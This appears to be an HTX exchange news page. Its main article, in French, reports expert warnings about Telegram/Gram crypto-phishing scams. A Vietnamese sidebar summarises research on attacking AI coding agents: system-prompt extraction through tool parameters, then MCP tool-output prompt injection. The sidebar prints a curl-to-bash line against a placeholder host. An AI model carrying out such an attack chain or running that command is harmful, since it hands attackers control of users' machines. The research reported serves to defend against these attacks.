Gram du doute : des escrocs ont développé un système avec un nouveau service sur Telegram

cryptonews.ruXuất bản vào 2026-08-07Cập nhật gần nhất vào 2026-08-07

Tóm tắt

Des escrocs exploitent les récentes actualités autour de Telegram et de son fondateur Pavel Dourov pour propager de nouveaux schémas de phishing liés à la cryptomonnaie Gram. Ils incitent les utilisateurs à échanger de prétendus anciens jetons, à retirer des fonds avant une supposée future interdiction de l'application, ou à obtenir gratuitement des cryptomonnaies via de faux services. Les experts observent une forte augmentation des domaines frauduleux évoquant Telegram, Dourov ou Gram, ainsi que la création de sites et de bots télégrammes imitant le style officiel de la plateforme. Leur méthode principale repose sur la manipulation psychologique : créer un sentiment d'urgence, exploiter la peur de perdre ses actifs et promettre des gains faciles. Les victimes sont invitées à s'authentifier via Telegram, à saisir leur phrase de récupération (seed phrase) ou à confirmer des transactions sur des pages contrefaites, ce qui conduit au vol pur et simple de leurs fonds. Les escrocs construisent des chaînes de confiance complexes, guidant les utilisateurs des moteurs de recherche vers des canaux, puis des bots et enfin des sites frauduleux. Les spécialistes mettent en garde : les designs professionnels, les avis ou les connexions sécurisées ne garantissent pas l'authenticité d'un service. Telegram ne procède jamais à des distributions gratuites de cryptomonnaie ou à des conversions de jetons via des sites ou des bots tiers. La meilleure protection reste la vigilance : éviter les ...

Des escrocs ont commencé à utiliser activement les actualités autour de Telegram et de Pavel Dourov (inscrit sur la liste des terroristes et extrémistes en Russie) pour propager de nouveaux systèmes de phishing liés à la cryptomonnaie Gram. On propose aux utilisateurs d'échanger d'urgence d'anciens jetons, de retirer des fonds avant un prétendu blocage imminent du messager ou d'obtenir une cryptomonnaie gratuite via des services spéciaux. Selon les experts, les malfaiteurs créent de faux sites web et des bots Telegram, conçus dans le style officiel de la plateforme. Les principaux outils d'influence sont la peur de perdre des fonds et la promesse de gains faciles.

Les faux services de Telegram

Après l'apparition des actualités autour de Telegram, les experts en cybersécurité ont constaté une forte augmentation d'activités suspectes. Selon eux, les malfaiteurs ont commencé à enregistrer massivement des domaines mentionnant Telegram, Pavel Dourov et la cryptomonnaie Gram – le jeton natif de la blockchain TON, ainsi qu'à lancer de faux services promettant aux utilisateurs de conserver l'accès à leurs actifs ou de gagner rapidement de l'argent sur la nouvelle « monnaie ».

— À partir du 30 juillet, les analystes de SBA constatent une intensification de l'activité d'enregistrement autour de Telegram. En six jours, le nombre de nouveaux domaines mentionnant Telegram ou Dourov a augmenté d'environ 18 %. Dans le même temps, le nombre de domaines présentant des signes potentiels de phishing a doublé. L'enregistrement groupé le 3 août de 11 domaines similaires, se faisant passer pour des services de vérification et de protection de Telegram, est particulièrement remarquable, — a déclaré à « Izvestia » Sergeï Troukhatchev, responsable du service Smart Business Alert de la société ECA PRO.

Selon lui, les escrocs exploitent activement les inquiétudes des utilisateurs concernant l'avenir de Telegram. On persuade les gens que les services affiliés au fondateur du messager seront bientôt, prétendument, indisponibles, et qu'il est donc nécessaire de transférer ses fonds le plus rapidement possible ou d'utiliser un nouveau service crypto.

Les criminels ont pratiquement immédiatement commencé à utiliser ce prétexte informationnel pour créer de nouvelles légendes, a noté Pavel Kovalenko, directeur du centre de lutte contre la fraude de la société « Informzaschita ». Selon lui, le lancement du portefeuille non-custodial intégré Gram a offert des possibilités supplémentaires aux malfaiteurs. Les utilisateurs n'ont pas encore eu le temps de comprendre cette nouvelle fonctionnalité, ce dont les escrocs profitent activement, en faisant passer de faux services pour des outils officiels de Telegram.

Fedor Chunizhekov, responsable du groupe de recherche Positive Technologies, a donné une évaluation similaire. Il a noté que les événements médiatiques deviennent traditionnellement la base de nouveaux scénarios d'ingénierie sociale.

— On informe l'utilisateur qu'il doit « confirmer d'urgence son compte », « retirer ses actifs avant le blocage », « échanger d'anciennes pièces », « obtenir des jetons gratuits » ou « s'inscrire au nouveau service avant les autres ». Ce sont précisément le sentiment d'urgence, la promesse d'un gain gratuit et l'exclusivité de l'offre qui deviennent les principaux outils de manipulation et de pression psychologique, — a-t-il expliqué.

Les approches systématiques des escrocs

L'objectif principal des escrocs est de convaincre une personne de fournir d'elle-même l'accès à son portefeuille crypto. Après avoir cliqué sur un lien, on demande à l'utilisateur de s'authentifier via Telegram, d'entrer sa phrase de récupération (seed phrase) ou de confirmer une transaction, après quoi les actifs sont irréversiblement transférés aux malfaiteurs, a expliqué Pavel Kovalenko.

En substance, les criminels misent non pas sur le piratage technologique, mais sur la pression psychologique, a ajouté Igor Bederov, président du conseil de lutte contre les infractions technologiques du KS NSB de Russie, fondateur de la société « Internet-Rozyck ».

Les escrocs ne piratent pas des protocoles blockchain complexes, ils piratent la crédulité et l'appât du « cadeau » sur fond de titres de presse alarmistes. En outre, le nombre d'enregistrements de domaines de phishing contenant les mots gram, wallet, convert et gift associés à Telegram a augmenté de dizaines de fois, — a souligné l'expert.

Dans le même temps, les campagnes frauduleuses deviennent de plus en plus sophistiquées. Aujourd'hui, les malfaiteurs construisent des chaînes de confiance entières, faisant passer l'utilisateur successivement des résultats de recherche vers un canal Telegram, puis vers un bot et vers un faux site web, a expliqué Mikhaïl Chouryguine, président de la commission ROTsIT sur les technologies cloud, l'hébergement et la sécurité informatique.

— On peut parler d'une transition de l'envoi primitif de liens malveillants vers la création de véritables « écosystèmes de fausse confiance », — a-t-il noté.

Un design de qualité, la présence d'avis, d'un service client et même d'une connexion sécurisée ne sont plus considérés comme des signes de fiabilité d'une ressource. Il est important que les utilisateurs se souviennent que Telegram et ses services officiels ne distribuent pas de cryptomonnaie ni ne convertissent de jetons via des sites ou des bots tiers, a rappelé l'expert.

Les malfaiteurs utilisent aussi activement des pages de phishing et des crypto-draineurs — des programmes malveillants qui incitent les utilisateurs à connecter eux-mêmes leurs portefeuilles crypto à de faux sites ou à entrer leurs identifiants Telegram sous prétexte de recevoir des jetons gratuits et d'autres bonus, a ajouté Maria Sinitsyna, analyste senior du département de protection contre les risques numériques de la société F6.

— La vulnérabilité principale dans 99% de ces attaques se situe à l'intersection entre la technologie et la psychologie humaine, — a noté Igor Bederov.

Les experts interrogés s'accordent à dire que la principale protection des actifs numériques reste la prudence. Ils recommandent de ne pas cliquer sur des liens publicitaires, de ne pas entrer de phrases de récupération (seed phrases) ou de codes de confirmation sur des ressources tierces, et de n'utiliser que les services officiels de Telegram pour travailler avec les portefeuilles crypto.

end-content

Tiền kỹ thuật số thịnh hành

Câu hỏi Liên quan

QQuelle est la principale nouvelle tendance d'escroquerie exploitant l'actualité autour de Telegram et de Pavel Dourov ?

ALes escrocs exploitent les inquiétudes concernant l'avenir de Telegram pour propager de nouveaux schémas de phishing liés à la cryptomonnaie Gram. Ils créent de faux sites et bots imitant le style officiel, incitant les utilisateurs à échanger d'anciens jetons, retirer des fonds avant une prétendue interdiction, ou obtenir de la cryptomonnaie gratuite.

QComment les escrocs manipulent-ils psychologiquement leurs victimes selon les experts ?

AIls utilisent un sentiment d'urgence, la promesse de gains faciles ou de bénéfices exclusifs, ainsi que la peur de perdre ses actifs. Ces techniques de pression psychologique visent à court-circuiter la méfiance et pousser à agir rapidement.

QQuelle méthode technique les escrocs utilisent-ils principalement pour voler les actifs ?

ALeur objectif principal est de convaincre la victime de donner volontairement l'accès à son portefeuille crypto. Après un clic sur un lien, l'utilisateur est invité à s'authentifier via Telegram, à entrer sa phrase seed ou à confirmer une transaction, ce qui transfère les actifs aux criminels.

QQue conseillent les experts pour se protéger contre ces escroqueries ?

AIl faut être prudent, ne pas cliquer sur des liens publicitaires suspects, ne jamais entrer ses phrases seed ou codes de confirmation sur des sites tiers, et n'utiliser que les services officiels de Telegram pour gérer ses portefeuilles cryptographiques.

QPourquoi les escroqueries actuelles sont-elles considérées comme plus sophistiquées ?

ALes escrocs construisent désormais des chaînes de confiance complexes, guidant les utilisateurs des résultats de recherche vers un canal Telegram, puis un bot, puis un faux site. Ils créent de véritables écosystèmes d'usurpation d'identité, avec un design soigné, de faux avis et un support client, rendant la fraude plus crédible.

Nội dung Liên quan

Kho dự trữ Bitcoin của Strategy thu lợi nhuận $1 tỷ nhờ giá Bitcoin tăng

Kho dự trữ bitcoin của công ty MicroStrategy do Michael Saylor đứng đầu đã thoát khỏi tình trạng lỗ nhờ đà tăng giá của tiền mã hóa. Lợi nhuận chưa thực hiện từ khoản đầu tư này đã vượt quá 1 tỷ USD. Vào ngày 21 tháng 8, giá Bitcoin ($BTC) lần đầu tiên tăng vọt trên 76.000 USD kể từ cuối tháng Năm, với mức tăng 21% trong tuần. Tính đến 10:45 giờ Moscow, Bitcoin được giao dịch quanh mức 76.700 USD. MicroStrategy sở hữu 840.447 BTC với giá mua trung bình là 75.385 USD. Từ năm 2020, công ty đã chi 63,36 tỷ USD để tích lũy số bitcoin này. Với giá hiện tại, tổng giá trị kho dự trữ đã đạt 64,46 tỷ USD, vượt quá chi phí đầu tư khoảng 1,1 tỷ USD. Sự thay đổi mạnh mẽ này diễn ra chưa đầy một tháng sau khi MicroStrategy báo cáo khoản lỗ 8,2 tỷ USD trong quý II, chủ yếu do tổn thất chưa thực hiện từ khoản đầu tư vào Bitcoin (khi đó giá vào khoảng 60.000 USD cuối tháng Sáu). Để duy trì ổn định tài chính, công ty đã phải bán một phần bitcoin và tăng cường dự trữ USD. Tuy nhiên, đầu tháng Tám, CEO Phong Le tuyên bố công ty sẽ tiếp tục tích lũy tiền mã hóa vào cuối năm nay.

cryptonews.ru7 phút trước

Kho dự trữ Bitcoin của Strategy thu lợi nhuận $1 tỷ nhờ giá Bitcoin tăng

cryptonews.ru7 phút trước

RWA Token hóa bước sang giai đoạn tiếp theo: Lợi thế thực sự cần thời gian để xây dựng là gì?

Khung phát hành token hóa tài sản thực (RWA) đang ngày càng trưởng thành, giúp việc đưa tài sản lên chuỗi trở nên nhanh chóng hơn. Tuy nhiên, khi rào cản về "phát hành" giảm xuống, câu hỏi quan trọng hơn là: điều gì sẽ xảy ra sau khi phát hành? Lợi thế cạnh tranh lâu dài không chỉ nằm ở loại tài sản được token hóa, mà còn ở khả năng vận hành bền vững và hồ sơ theo dõi được tích lũy theo thời gian. Bài viết nêu bật khái niệm "Lớp Dự trữ" (Reserve Layer) – cơ sở hạ tầng kết nối tài sản thực chất lượng cao với các hệ thống xác minh, thanh khoản và vận hành cần thiết trên chuỗi. Không phải mọi tài sản đều phù hợp làm tài sản dự trữ. Các tài sản như trái phiếu kho bạc Mỹ ngắn hạn, vàng vật chất có tính xác định giá trị cao, thị trường sâu và tiêu chuẩn hóa tốt. Ngược lại, các tài sản như tín dụng tư nhân phức tạp hơn do tính không đồng nhất. Lợi thế thực sự khó sao chép là hồ sơ vận hành lâu dài được xây dựng thông qua việc thực thi nhất quán: kiểm toán dự trữ độc lập định kỳ, cơ chế mua lại đã được chứng minh, duy trì tính liên tục thị trường, mở rộng tích hợp hệ sinh thái và xây dựng tính thanh khoản. Các bằng chứng này tích lũy theo thời gian, tạo niềm tin cho các tổ chức và củng cố vòng tròn tăng cường: hồ sơ vận hành mạnh hơn dẫn đến phân phối rộng hơn, thanh khoản sâu hơn và tiện ích tài sản thế chấp lớn hơn. Chất lượng tài sản cơ bản và năng lực vận hành của bên phát hành là hai trụ cột không thể thiếu cho sự bền vững. Sự kết hợp của tài sản dự trữ chất lượng cao với năng lực vận hành đã được chứng minh sẽ tạo nền tảng vững chắc nhất. Trong khi đó, ngay cả những tài sản chất lượng cao cũng có thể tiềm ẩn rủi ro nếu cơ sở hạ tầng vận hành phía sau chưa được kiểm chứng qua thời gian và các điều kiện thị trường khác nhau. Tóm lại, một thập kỷ sau, những dự án RWA vẫn giữ được niềm tin của thị trường và tiếp tục hoạt động sẽ là những người kết hợp thành công tài sản dự trữ chất lượng cao với kỷ luật vận hành lâu dài, biến chúng thành cơ sở hạ tầng đáng tin cậy cho tài chính trên chuỗi.

marsbit9 phút trước

RWA Token hóa bước sang giai đoạn tiếp theo: Lợi thế thực sự cần thời gian để xây dựng là gì?

marsbit9 phút trước

Artemis: Tại sao chúng tôi lạc quan về Circle?

**Artemis: Tại sao chúng tôi lạc quan về Circle?** Thị trường hiện đang định giá thấp Circle (CRCL) do lo ngại về Open Standard - một liên minh 140+ công ty (gồm Stripe, Visa, Mastercard, Google) phát hành stablecoin OUSD, đe dọa vị thế của USDC. Tuy nhiên, quan điểm của Artemis là thị trường đang nhầm lẫn. Ba luận điểm cốt lõi: 1. **Tăng trưởng ổn định:** Stablecoin dự kiến đạt quy mô **1 nghìn tỷ USD vào năm 2030** (tăng trưởng kép hàng năm ~40%), và đã tách biệt khỏi chu kỳ giá crypto. 2. **Hiệu ứng mạng và tính thanh khoản:** Thị trường có xu hướng "kẻ thắng hưởng tất". USDC và Tether hiện nắm hơn **80% thị phần**, xây dựng rào cản cực kỳ khó vượt qua về thanh khoản xuyên chuỗi và ứng dụng. Các liên minh như Open Standard khó thành công do thiếu động lực và quản trị đồng thuận. 3. **Định giá sai lầm:** Thị trường xem Circle chỉ là "nhà phát hành stablecoin" phụ thuộc vào lãi suất, trong khi thực chất họ đang xây dựng một **nền tảng tiền tệ toàn diện (full-stack money platform)** với các sản phẩm như Mạng Thanh toán Circle (Circle Payments Network - giao dịch tăng 6.8 lần/năm) và blockchain Arc. Khi Circle đa dạng hóa doanh thu từ phí giao dịch và blockchain, định giá (P/S) hiện tại ~6.7x được kỳ vọng mở rộng lên ~10x. Với kịch bản ổn định, doanh thu Circle có thể đạt ~5 tỷ USD vào năm 2030, dẫn đến định giá vốn hóa tiềm năng **~50 tỷ USD**. Mức giá hiện tại sau cú sốc Open Standard có thể đang tạo ra chênh lệch kỳ vọng lớn nhất.

marsbit10 phút trước

Artemis: Tại sao chúng tôi lạc quan về Circle?

marsbit10 phút trước

Claude Code Dễ Dàng Bị Bẻ Khóa, Chỉ Cần Một Công Cụ Giả Mạo

Người dùng yêu cầu trợ lý lập trình AI viết một trò chơi rắn săn mồi. Tác nhân AI đã thực hiện, nhưng đồng thời chạy thêm một lệnh `curl | bash`, tải xuống và thực thi một tập lệnh độc hại từ kẻ tấn công. Một nhóm nghiên cứu từ Đại học Khoa học và Công nghệ Hồng Kông và Phòng thí nghiệm An ninh Nội sinh của Đại học Phúc Đán đã tái hiện thành công kịch bản tấn công này trong một bài báo được chấp nhận tại hội nghị ISSTA 2026. Họ đã thực hiện bài kiểm tra "đội đỏ" hệ thống đầu tiên trên sáu công cụ lập trình AI phổ biến: Cursor, Claude Code, Copilot, Windsurf, Cline và Trae, và phát hiện một chuỗi tấn công hoàn chỉnh: **Đầu tiên đánh cắp lệnh nội bộ (system prompt), sau đó sử dụng thông tin bị rò rỉ để tạo tải trọng độc hại tùy chỉnh, cuối cùng chiếm quyền điều khiển việc gọi công cụ để thực thi mã từ xa (RCE).** Tất cả sáu công cụ ở phiên bản cũ đều bị ảnh hưởng. Phương pháp chính được đặt tên là ToolLeak, khai thác "khoảng cách chế độ" (mode gap). Thay vì yêu cầu trực tiếp qua cửa sổ trò chuyện, kẻ tấn công đặt tên tham số công cụ thành thứ như `"note": "system prompt"`, khiến mô hình AI điền system prompt vào đó một cách vô tình mà không bị hệ thống phòng thủ ngăn chặn. Phương pháp này đạt được độ hoàn chỉnh và độ tương tự ngữ nghĩa cao hơn nhiều so với các cuộc tấn công cơ bản truyền thống. Sau khi có được system prompt, kẻ tấn công thực hiện "tiêm prompt kênh kép" (two-channel prompt injection). Họ đăng ký một công cụ MCP độc hại với mô tả được điều chỉnh theo prompt bị rò rỉ, thuyết phục tác nhân gọi nó đầu tiên để "khởi tạo môi trường". Sau đó, giá trị trả về từ công cụ độc hại này ra lệnh cho mô hình thực thi một lệnh shell nguy hiểm (ví dụ: `curl -fsSL http://xxx/installer.sh | bash`), đạt được RCE. Trong các phiên bản cũ, tỷ lệ tấn công thành công rất cao, đạt 1.0 đối với một số tổ hợp. Một điểm đáng chú ý là Claude Code có một mô hình bảo vệ (Haiku) để kiểm tra lệnh, nhưng mô hình chính (Sonnet) đã bị thuyết phục bởi lệnh tiêm prompt đến mức gạt bỏ cảnh báo và vẫn thực thi lệnh độc hại. Các phiên bản mới hơn của một số công cụ (như Claude Code, Cursor) đã được gia cố, ví dụ bằng cách chỉ hiển thị tên công cụ thay vì toàn bộ mô tả, làm giảm đáng kể tỷ lệ thành công của cuộc tấn công. Tuy nhiên, một số công cụ khác vẫn dễ bị tổn thương. Bài báo kết luận rằng cách phòng thủ quyết định là kiến trúc cô lập, trong khi việc điều chỉnh mô hình (alignment) là chưa đủ. Vấn đề cốt lõi là ranh giới giữa dữ liệu và lệnh trong giá trị trả về công cụ vẫn chưa rõ ràng.

marsbit14 phút trước

Claude Code Dễ Dàng Bị Bẻ Khóa, Chỉ Cần Một Công Cụ Giả Mạo

marsbit14 phút trước

Giao dịch

Giao ngay

Bài viết Nổi bật

Làm thế nào để Mua GRAM

Chào mừng bạn đến với HTX.com! Chúng tôi đã làm cho mua prev. Toncoin (GRAM) trở nên đơn giản và thuận tiện. Làm theo hướng dẫn từng bước của chúng tôi để bắt đầu hành trình tiền kỹ thuật số của bạn.Bước 1: Tạo Tài khoản HTX của BạnSử dụng email hoặc số điện thoại của bạn để đăng ký tài khoản miễn phí trên HTX. Trải nghiệm hành trình đăng ký không rắc rối và mở khóa tất cả tính năng. Nhận Tài khoản của tôiBước 2: Truy cập Mua Crypto và Chọn Phương thức Thanh toán của BạnThẻ Tín dụng/Ghi nợ: Sử dụng Visa hoặc Mastercard của bạn để mua prev. Toncoin (GRAM) ngay lập tức.Số dư: Sử dụng tiền từ số dư tài khoản HTX của bạn để giao dịch liền mạch.Bên thứ ba: Chúng tôi đã thêm những phương thức thanh toán phổ biến như Google Pay và Apple Pay để nâng cao sự tiện lợi.P2P: Giao dịch trực tiếp với người dùng khác trên HTX.Thị trường mua bán phi tập trung (OTC): Chúng tôi cung cấp những dịch vụ được thiết kế riêng và tỷ giá hối đoái cạnh tranh cho nhà giao dịch.Bước 3: Lưu trữ prev. Toncoin (GRAM) của BạnSau khi mua prev. Toncoin (GRAM), lưu trữ trong tài khoản HTX của bạn. Ngoài ra, bạn có thể gửi đi nơi khác qua chuyển khoản blockchain hoặc sử dụng để giao dịch những tiền kỹ thuật số khác.Bước 4: Giao dịch prev. Toncoin (GRAM)Giao dịch prev. Toncoin (GRAM) dễ dàng trên thị trường giao ngay của HTX. Chỉ cần truy cập vào tài khoản của bạn, chọn cặp giao dịch, thực hiện giao dịch và theo dõi trong thời gian thực. Chúng tôi cung cấp trải nghiệm thân thiện với người dùng cho cả người mới bắt đầu và người giao dịch dày dạn kinh nghiệm.

Tổng lượt xem 607Xuất bản vào 2026.06.15Cập nhật vào 2026.08.20

Làm thế nào để Mua GRAM

Thảo luận

Chào mừng đến với Cộng đồng HTX. Tại đây, bạn có thể được thông báo về những phát triển nền tảng mới nhất và có quyền truy cập vào thông tin chuyên sâu về thị trường. Ý kiến ​​của người dùng về giá của GRAM (GRAM) được trình bày dưới đây.

活动图片